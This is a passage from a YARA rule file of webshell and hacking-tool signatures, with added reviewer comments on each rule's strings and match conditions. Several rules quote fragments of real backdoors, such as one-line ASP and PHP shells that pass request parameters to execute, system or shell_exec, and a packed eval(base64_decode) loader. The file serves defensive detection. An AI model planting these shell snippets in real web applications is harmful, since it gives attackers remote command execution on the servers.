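		hash2 = "e0202adff532b28ef1ba206cf95962f2"
		hash3 = "802f5cae46d394b297482fd0c27cb2fc"
	strings:
		$s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
	condition:
		all of them
}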
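rule Unpack_Injectt {
	// Injectt.exe (unpacked build; Pack_InjectT above covers the packed one).
	// Strings are the usage text (-Run / -Uninstall, padded with spaces to
	// align the arrows - keep the spacing exact) and a service-manager access
	// mask expression; all three required.
	meta:
		description = "Webshells Auto-generated - file Injectt.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "8a5d2158a566c87edc999771e12d42c5"
	strings:
		$s2 = "%s -Run                              -->To Install And Run The Service"
		$s3 = "%s -Uninstall                        -->To Uninstall The Service"
		$s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"
	condition:
		all of them
}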
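rule DxShell_php_php {
	// DxShell. Either of two print() fragments: the "view the file as is" tip
	// or the "POST (php eval)" table row. Both are truncated at 80 characters
	// by the generator, hence the open-ended endings.
	meta:
		description = "Semi-Auto-generated  - file DxShell.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "33a2b31810178f4c2e71fbdeb4899244"
	strings:
		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
		$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
	condition:
		1 of them
}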
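rule FSO_s_zehir4 {
	// zehir4.asp, same sample hash as FSO_s_zehir4_2 earlier in this file. The
	// single string is a short space-delimited token (" byMesaj "), which is
	// weaker than the path fragment used by the companion rule; prefer to
	// corroborate a hit with that rule.
	meta:
		description = "Webshells Auto-generated - file zehir4.asp"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "5b496a61363d304532bcf52ee21f5d55"
	strings:
		$s5 = " byMesaj "
	condition:
		all of them
}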
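rule shelltools_g0t_root_HideRun {
	// HideRun.exe from the "g0t root" toolset: its usage line and the PVAX SW
	// copyright string; both required.
	meta:
		description = "Webshells Auto-generated - file HideRun.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "45436d9bfd8ff94b71eeaeb280025afe"
	strings:
		$s0 = "Usage -- hiderun [AppName]"
		$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
	condition:
		all of them
}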
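rule telnetd_pl {
	// telnetd.pl (Perl). Any one of: the handle "0ldW0lf", two chat-style
	// messages, the TIOCSWINSZ ioctl on the client pty, or an IRC contact
	// address. $s3 is the only code-level string; the others are banner text.
	meta:
		description = "Semi-Auto-generated  - file telnetd.pl.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "5f61136afd17eb025109304bd8d6d414"
	strings:
		$s0 = "0ldW0lf" fullword
		$s1 = "However you are lucky :P"
		$s2 = "I'm FuCKeD"
		$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
		$s4 = "atrix@irc.brasnet.org"
	condition:
		1 of them
}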
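rule webshell_webshells_new_jspyyy {
	// jspyyy.jsp. Single string: the compact page header that imports java.io
	// and immediately branches on request parameter "f".
	meta:
		description = "Web shells - generated from file jspyyy.jsp"
		author = "Florian Roth"
		date = "2014/03/28"
		score = 70
		hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"
	strings:
		$s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"
	condition:
		all of them
}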
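rule FSO_s_indexer {
	// indexer.asp. Single string: a Turkish-labelled ("Nereye") destination
	// input from the shell's form.
	meta:
		description = "Webshells Auto-generated - file indexer.asp"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "135fc50f85228691b401848caef3be9e"
	strings:
		$s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"
	condition:
		all of them
}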
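rule rdrbs084 {
	// rdrbs084.exe - a port-mapping/redirector tool. Both usage-text strings
	// are required.
	meta:
		description = "Webshells Auto-generated - file rdrbs084.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "ed30327b255816bdd7590bf891aa0020"
	strings:
		$s0 = "Create mapped port. You have to specify domain when using HTTP type."
		$s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"
	condition:
		all of them
}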
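rule webshell_h4ntu_shell_powered_by_tsoi_ : webshell {
	// "h4ntu shell [powered by tsoi]". Four HTML/PHP fragments, all required:
	// three styled <TD> rows (leading spaces are part of the strings) and the
	// "cmd" text input that echoes the previous command.
	meta:
		description = "Web Shell - file h4ntu shell [powered by tsoi].php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "06ed0b2398f8096f1bebf092d0526137"
	strings:
		$s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"
		$s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"
		$s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "
		$s5 = "<INPUT TYPE=\"text\" NAME=\"cmd\" value=\"<?php echo stripslashes(htmlentities($"
	condition:
		all of them
}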
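rule httpdoor {
	// httpdoor.exe. $s7 is the start of a standard Windows side-by-side
	// manifest and $s6 a common import-table name, so on their own they are
	// not indicative; $s4/$s5 are binary-derived fragments. All four required.
	meta:
		description = "Webshells Auto-generated - file httpdoor.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "6097ea963455a09474471a9864593dc3"
	strings:
		$s4 = "''''''''''''''''''DaJKHPam"
		$s5 = "o,WideCharR]!n]"
		$s6 = "HAutoComplete"
		$s7 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch"
	condition:
		all of them
}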
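rule webshell_webshells_new_pHp {
	// pHp.php. Apart from $s0 (a call to a function named antivirus()), the
	// strings are PHP regex literals the sample uses to scan other files for
	// eval/exec/include patterns. A benign webshell scanner carrying the same
	// patterns would also satisfy "1 of them" - check context on a hit.
	meta:
		description = "Web shells - generated from file pHp.php"
		author = "Florian Roth"
		date = "2014/03/28"
		score = 70
		hash = "b0e842bdf83396c3ef8c71ff94e64167"
	strings:
		$s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
		$s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"
		$s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"
		$s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"
		$s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"
	condition:
		1 of them
}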
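rule webshell_ASP_aspydrv {
	// aspydrv.asp. Single string: the drive-enumeration table row
	// (thingy.DriveLetter / thingy.DriveType).
	meta:
		description = "Web Shell - file aspydrv.asp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "de0a58f7d1e200d0b2c801a94ebce330"
	strings:
		$s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"
	condition:
		all of them
}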
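rule thelast_index3 {
	// index3.php. Single string: a form-validation error message
	// ("Your Name" not entered) as written in the sample.
	meta:
		description = "Webshells Auto-generated - file index3.php"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "cceff6dc247aaa25512bad22120a14b4"
	strings:
		$s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"
	condition:
		all of them
}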
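rule multiple_webshells_0029 {
	// Super-rule over c99shell/c99php/1.txt/c2007/c100. Single string: the
	// exact "SHOW PROCESSLIST" query line including its trailing space (the
	// fullword modifier still applies at the string's edges).
	meta:
		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		super_rule = 1
		was = "_c99shell_v1_0_php_php_c99php_1_c2007_php_php_c100_php"
		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
		hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
		hash3 = "d089e7168373a0634e1ac18c0ee00085"
		hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"
	strings:
		$s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
	condition:
		all of them
}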
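rule Moroccan_Spamers_Ma_EditioN_By_GhOsT_php {
	// "Moroccan Spamers" PHP mailer. Any one of: a hard-coded address assigned
	// to $sd98, the "Sending mail to" progress print, or a table cell
	// referencing /simparts/images/cellpic1.gif.
	meta:
		description = "Semi-Auto-generated  - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "d1b7b311a7ffffebf51437d7cd97dc65"
	strings:
		$s0 = ";$sd98=\"john.barker446@gmail.com\""
		$s1 = "print \"Sending mail to $to....... \";"
		$s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"
	condition:
		1 of them
}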
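rule jsp_cmd : webshell {
	// Laudanum cmd.war. Matches the ZIP container, not the JSP inside:
	// uint16(0) == 0x4b50 is the little-endian "PK" local-file signature,
	// filesize < 2KB bounds it to a tiny archive, and the strings are the
	// archive entry names as they appear adjacent to the next "PK" header.
	// The web.xml/MANIFEST.MF entries are common to any WAR (see the goodware
	// counts); cmd.jsp is the discriminating name.
	meta:
		description = "Laudanum Injector Tools - file cmd.war"
		author = "Florian Roth"
		reference = "http://laudanum.inguardians.com/"
		date = "2015-06-22"
		hash = "55e4c3dc00cfab7ac16e7cfb53c11b0c01c16d3d"
	strings:
		$s0 = "cmd.jsp}" fullword ascii
		$s1 = "cmd.jspPK" fullword ascii
		$s2 = "WEB-INF/web.xml" fullword ascii /* Goodware String - occured 1 times */
		$s3 = "WEB-INF/web.xmlPK" fullword ascii /* Goodware String - occured 1 times */
		$s4 = "META-INF/MANIFEST.MF" fullword ascii /* Goodware String - occured 12 times */
	condition:
		uint16(0) == 0x4b50 and filesize < 2KB and all of them
}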
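rule c99madshell_v2_0_php_php {
	// c99madshell v2.0. Single string: the eval(gzinflate(base64_decode(...)))
	// loader together with the first bytes of its encoded payload, so it keys
	// on this specific packed build rather than the c99 family in general.
	meta:
		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "d27292895da9afa5b60b9d3014f39294"
	strings:
		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
	condition:
		all of them
}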
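rule webshell_jsp_asd {
	// asd.jsp. $s3 is an ordinary JSP page directive (gbk encoding) and only
	// narrows the language/locale; $s6, the input pre-filled with
	// application.getRealPath("/"), carries the signal. Both required.
	meta:
		description = "Web Shell - file asd.jsp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "a042c2ca64176410236fcc97484ec599"
	strings:
		$s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
		$s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"
	condition:
		all of them
}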
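rule webshell_PHP_sql : webshell {
	// sql.php. Both required: a mysql_list_tables() call with the shell's
	// $h_error/$f_ error wrapper, and a self-link that carries login and
	// password in the query string.
	meta:
		description = "Web Shell - file sql.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "2cf20a207695bbc2311a998d1d795c35"
	strings:
		$s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"
		$s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
	condition:
		all of them
}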
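rule saphpshell {
	// saphpshell.php. Single string: the "command" text input that echoes
	// $_POST['command'] back via a short echo tag.
	meta:
		description = "Webshells Auto-generated - file saphpshell.php"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "d7bba8def713512ddda14baf9cd6889a"
	strings:
		$s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"
	condition:
		all of them
}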
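rule multiple_webshells_0007 {
	// Super-rule over r577/spy/s.php. Either of two echo fragments from the
	// shell's SQL panel: the db_query textarea or the sr()/$lang-driven
	// database <select>.
	meta:
		description = "Semi-Auto-generated  - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		super_rule = 1
		was = "_r577_php_php_spy_php_php_s_php_php"
		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
		hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
		hash2 = "817671e1bdc85e04cc3440bbd9288800"
	strings:
		$s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"
		$s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"
	condition:
		1 of them
}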
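rule webshell_cihshell_fix : webshell {
	// cihshell_fix.php. Either a styled table row opening a form, or the
	// mysqlw_host POST-parameter handling for the shell's DB client.
	meta:
		description = "Web Shell - file cihshell_fix.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "3823ac218032549b86ee7c26f10c4cb5"
	strings:
		$s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"
		$s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"
	condition:
		1 of them
}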
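rule webshell_s72_Shell_v1_1_Coding {
	// s72 Shell v1.1. Single string: a purple Verdana label beginning the
	// Turkish upload prompt ("Buradan Dosya ").
	meta:
		description = "Web Shell - file s72 Shell v1.1 Coding.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "c2e8346a5515c81797af36e7e4a3828e"
	strings:
		$s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "
	condition:
		all of them
}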
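rule webshell_jsp_action {
	// action.jsp. Both strings are generic on their own - a stock Oracle thin
	// JDBC URL for a local "orcl" instance and a gb2312 contentType directive -
	// so a legitimate JSP page combining the two would also match. Expect to
	// triage hits against the rest of the file.
	meta:
		description = "Web Shell - file action.jsp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"
	strings:
		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
		$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
	condition:
		all of them
}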
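rule webshell_webshells_new_JJjsp3 {
	// JJjsp3.jsp. Single string: the page directive importing io/util/net/sql/
	// text packages in one line, immediately followed by a declaration block.
	meta:
		description = "Web shells - generated from file JJjsp3.jsp"
		author = "Florian Roth"
		date = "2014/03/28"
		score = 70
		hash = "949ffee1e07a1269df7c69b9722d293e"
	strings:
		$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
	condition:
		all of them
}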
rule sig_2008_php_php {
	meta:
		description = "Semi-Auto-generated  - file 2008.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "3e4ba470d4c38765e4b16ed930facf2c"
	strings:
		// Author credits / site banner and two code fragments from the 2008.php
		// variant; any single hit is enough.
		$credit = "Codz by angel(4ngel)"
		$site = "Web: http://www.4ngel.net"
		$cookie_life = "$admin['cookielife'] = 86400;"
		$dl_error = "$errmsg = 'The file you want Downloadable was nonexistent';"
	condition:
		any of them
}
rule webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY {
	meta:
		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
		hash2 = "40a1f840111996ff7200d18968e42cfe"
		hash3 = "0712e3dc262b4e1f98ed25760b206836"
	strings:
		// Shared across the four PhpSpy builds listed above. Two of the four are
		// required so that a lone 4ngel.net reference does not trigger it.
		$site = "http://www.4ngel.net" fullword
		$phpenv_link = "</a> | <a href=\"?action=phpenv\">PHP" fullword
		$file_write = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
		$credit = "Codz by Angel" fullword
	condition:
		2 of ($site, $phpenv_link, $file_write, $credit)
}
rule BIN_Client {
	meta:
		description = "Webshells Auto-generated - file Client.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "9f0a74ec81bc2f26f16c5c172b80eca7"
	strings:
		// PE-side strings of the Client.exe remote-shell client. Several are
		// generic Win32 messages, hence the four-of-six threshold.
		$shell_closed = "=====Remote Shell Closed====="
		$file_filter = "All Files(*.*)|*.*||"
		$wsa_error = "WSAStartup Error!"
		$shget_api = "SHGetFileInfoA"
		$thread_error = "CreateThread False!"
		$port_error = "Port Number Error"
	condition:
		4 of ($*)
}
rule webshell_elmaliseker_2 {
	meta:
		description = "Web Shell - file elmaliseker.asp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
	strings:
		// FSO extension check inside a table cell and the editor toolbar button;
		// both fragments must be present.
		$fso_ext_check = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"
		$editor_button = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"
	condition:
		$fso_ext_check and $editor_button
}
rule cmdShell {
	meta:
		description = "Webshells Auto-generated - file cmdShell.asp"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "8a9fef43209b5d2d4b81dfbb45182036"
	strings:
		// Branch selecting the WScript.Shell execution path in cmdShell.asp.
		$wscript_branch = "if cmdPath=\"wscriptShell\" then"
	condition:
		$wscript_branch
}
rule dbgntboot {
	meta:
		description = "Webshells Auto-generated - file dbgntboot.dll"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "4d87543d4d7f73c1529c9f8066b475ab"
	strings:
		// Status/log strings from the dbgntboot.dll DoS component; both required.
		$dos_status = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
		$junk_msg = "sth junk the M$ Wind0wZ retur"
	condition:
		$dos_status and $junk_msg
}
rule multiple_webshells_0022 {
	meta:
		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		super_rule = 1
		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_SpecialShell_99_php_php"
		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
		hash1 = "3ca5886cd54d495dc95793579611f59a"
		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
		hash4 = "09609851caa129e40b0d56e90dfc476c"
	strings:
		// FTP brute-force helper shared by the c99 family; two hits required.
		$ftp_brute_fn = "c99ftpbrutecheck"
		$ftp_timer = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
		$fqb_len = "$fqb_lenght = $nixpwdperpage;" fullword
		$ftp_connect = "$sock = @ftp_connect($host,$port,$timeout);" fullword
	condition:
		2 of ($ftp_brute_fn, $ftp_timer, $fqb_len, $ftp_connect)
}
rule PHP_Backdoor_Connect_pl_php {
	meta:
		description = "Semi-Auto-generated  - file PHP Backdoor Connect.pl.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "57fcd9560dac244aeaf95fd606621900"
	strings:
		// Group banners and a userinfo echo from the connect-back script.
		$banner = "LorD of IRAN HACKERS SABOTAGE"
		$handle = "LorD-C0d3r-NT"
		$userinfo = "echo --==Userinfo==-- ;"
	condition:
		any of them
}
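rule webshell_caidao_shell_mdb {
	meta:
		description = "Web Shell - file mdb.asp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "fbf3847acef4844f3a0d04230f6b9ff9"
	strings:
		// One-line ASP eval shell: `execute request("ice")` runs whatever the
		// client sends in the "ice" parameter. The earlier anchor also required a
		// literal trailing "a " and `fullword`, so the identical one-liner followed
		// by any other byte was missed. The filler is dropped and, since VBScript
		// keywords are case-insensitive, `nocase` is added; every file the old
		// string matched is still matched.
		$eval_request = "<% execute request(\"ice\")%>" nocase
	condition:
		$eval_request
}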
rule Tool_asp {
	meta:
		description = "Semi-Auto-generated  - file Tool.asp.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
	strings:
		// Contact address, root-dir parameter, bilingual corruption notice and
		// the embedded hex key of Tool.asp; two hits required.
		$contact = "mailto:rhfactor@antisocial.com"
		$root_param = "?raiz=root"
		$corrupt_msg = "DIGO CORROMPIDO<BR>CORRUPT CODE"
		$hex_key = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
	condition:
		2 of ($contact, $root_param, $corrupt_msg, $hex_key)
}
rule webshell {
	meta:
		description = "Webshells Auto-generated - file webshell.php"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "f2f8c02921f29368234bfb4d4622ad19"
	strings:
		// NOTE(review): the anchors are short, non-textual byte runs pulled from an
		// apparently encoded sample, not source fragments; each is weak on its own,
		// which is why all five are required. The rule name is also the same word
		// used as a tag elsewhere in this file (e.g. `webshell_cihshell_fix : webshell`),
		// so its hits are hard to tell apart from tag-filtered output in triage.
		$frag_a = "RhViRYOzz"
		$frag_b = "d\\O!jWW"
		$frag_c = "bc!jWW"
		$frag_d = "0W[&{l"
		$frag_e = "[INhQ@\\"
	condition:
		$frag_a and $frag_b and $frag_c and $frag_d and $frag_e
}
rule FSO_s_ajan {
	meta:
		description = "Webshells Auto-generated - file ajan.asp"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "22194f8c44524f80254e1b5aec67b03e"
	strings:
		// ajan.asp writes out a second script that saves a binary stream to disk.
		$stream_save = "entrika.write \"BinaryStream.SaveToFile"
	condition:
		$stream_save
}
rule JSP_Browser_APT_webshell {
	meta:
		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
		author = "F.Roth"
		date = "10.10.2014"
		score = 60
	strings:
		// Command-interpreter table, exec call and timeout message of the
		// VonLoesch JSP file browser. NOTE(review): this is a dual-use admin tool,
		// so a hit on a legitimately deployed copy is possible; confirm intent
		// (who deployed it, where) before treating the match as an intrusion.
		$interp_decl = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
		$interp_win = "cmd\", \"/C\"}; // Dos,Windows" ascii
		$exec_call = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
		$timeout_msg = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
	condition:
		$interp_decl and $interp_win and $exec_call and $timeout_msg
}
rule WebShell_AK_74_Security_Team_Web_Shell_Beta_Version {
	meta:
		description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
		author = "Florian Roth"
		hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"
	strings:
		// Team banner and two UI labels from the AK-74 shell; any one fires.
		$team_site = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
		$xff_label = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."
		$exec_label = "<b><font color=#83000>Execute system commands!</font></b>" fullword
	condition:
		any of them
}
rule ZXshell2_0_rar_Folder_ZXshell {
	meta:
		description = "Webshells Auto-generated - file ZXshell.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "246ce44502d2f6002d720d350e26c288"
	strings:
		// Two odd fragments from the ZXshell.exe binary; both required.
		$frag_preview = "WPreviewPagesn"
		$frag_absolutely = "DA!OLUTELY N"
	condition:
		$frag_preview and $frag_absolutely
}
rule multiple_webshells_0014 {
	meta:
		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		super_rule = 1
		was = "_r577_php_php_r57_Shell_php_php_spy_php_php_s_php_php"
		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
		hash1 = "8023394542cddf8aee5dec6072ed02b5"
		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
		hash3 = "817671e1bdc85e04cc3440bbd9288800"
	strings:
		// r57-family fragments: layout helper, LOAD DATA INFILE builder and the
		// default-command selection; two of three required.
		$ws_helper = "echo ws(2).$lb.\" <a"
		$load_infile = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"
		$default_cmd = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"
	condition:
		2 of ($ws_helper, $load_infile, $default_cmd)
}
rule simple_cmd_html {
	meta:
		description = "Semi-Auto-generated  - file simple_cmd.html.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "c6381412df74dbf3bcd5a2b31522b544"
	strings:
		// Minimal shell_exec() wrapper page; all four lines must be present,
		// which makes this a tight match on the exact template.
		$title = "<title>G-Security Webshell</title>" fullword
		$cmd_input = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
		$shell_exec = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
		$cmd_param = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
	condition:
		$title and $cmd_input and $shell_exec and $cmd_param
}
rule webshell_asp_cmdasp {
	meta:
		description = "Web Shell - file cmdasp.asp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "57b51418a799d2d016be546f399c2e9b"
	strings:
		// cmdasp.asp: prints MACHINE\user via WScript.Network, then runs the
		// command through cmd.exe redirected into a temp file. Both required.
		$whoami_line = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
		$cmd_run = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
	condition:
		$whoami_line and $cmd_run
}
rule webshell_jsp_utils {
	meta:
		description = "Web Shell - file utils.jsp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "9827ba2e8329075358b8e8a53e20d545"
	strings:
		// JDBC metadata enumeration plus the "z0" charset parameter handler that
		// also appears in the customize.jsp rule later in this file; both required.
		$jdbc_tables = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
		$z0_charset = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
	condition:
		$jdbc_tables and $z0_charset
}
rule webshell_asp_list {
	meta:
		description = "Web Shell - file list.asp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "1cfa493a165eb4b43e6d4cc0f2eab575"
	strings:
		// Hidden "type" field echoing <%=tipo%> and the FILE heading writer.
		$hidden_type = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
		$file_heading = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
	condition:
		$hidden_type and $file_heading
}
rule multiple_webshells_0011 {
	meta:
		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		super_rule = 1
		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php"
		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
		hash1 = "3ca5886cd54d495dc95793579611f59a"
		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
		hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
		hash4 = "09609851caa129e40b0d56e90dfc476c"
	strings:
		// c99-family file-create and SQL file-viewer branches; either fires.
		$mkfile_branch = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"
		$sql_getfile = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"
	condition:
		$mkfile_branch or $sql_getfile
}
rule FSO_s_ajan_2 {
	meta:
		description = "Webshells Auto-generated - file ajan.asp"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "22194f8c44524f80254e1b5aec67b03e"
	strings:
		// Quoted WScript.Shell instantiation (the script writes another script)
		// together with the dropped-archive path; both required.
		$quoted_wsh = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
		$zip_path = "/file.zip"
	condition:
		$quoted_wsh and $zip_path
}
rule webshell_php_cmd {
	meta:
		description = "Web Shell - file cmd.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "c38ae5ba61fd84f6bbbab98d89d8a346"
	strings:
		// Textbook GET-parameter to system() shell, including its own comment
		// header; all three lines required.
		$cmd_guard = "if($_GET['cmd']) {" fullword
		$header_comment = "// cmd.php = Command Execution" fullword
		$system_call = "  system($_GET['cmd']);" fullword
	condition:
		$cmd_guard and $header_comment and $system_call
}
